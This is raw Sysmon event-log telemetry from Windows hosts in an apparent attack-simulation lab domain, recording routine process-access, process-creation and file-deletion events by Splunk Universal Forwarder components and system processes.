08:09:26.539{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.539{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.524{0C1E0330-F8B6-60EB-ED79-00000000D001}776C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:26.398{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF138AEE4096449CA8BA167CE2F382FE,SHA256=BEC58953703C5274EC18FFFE5322D5B1B8685FA8F4510106EAAEA6D6B812A626,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:26.068{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFE0DCFE491B7337A22E4BC5B4F72478,SHA256=8A70BA9872D7D4F60891405BAA215C0928F78C49D37DEDBD46359EC455C3390E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810708Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810707Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810706Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810705Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810704Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810703Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810702Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810701Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.914{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.914{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.898{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.899{0C1E0330-F8B7-60EB-EF79-00000000D001}3744C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.523{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323CA87B1065A27A77CE6EEA4DC68F08,SHA256=146873D7F413F8C69A5EE985AD7639B08F0524A7AABDBCD41B22EC4DDFBDF9FE,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:09:27.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F57C325D2869C1EAB01AEEBEDE1586B2,SHA256=71A6C20BD6B9458A96F3338CA29EED1E88DFC6B66155BD1BB8D96190CB0C6AC5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.382{0C1E0330-F8B7-60EB-EE79-00000000D001}16443692C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000810694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F8B7-60EB-EE79-00000000D001}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:09:27.226{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
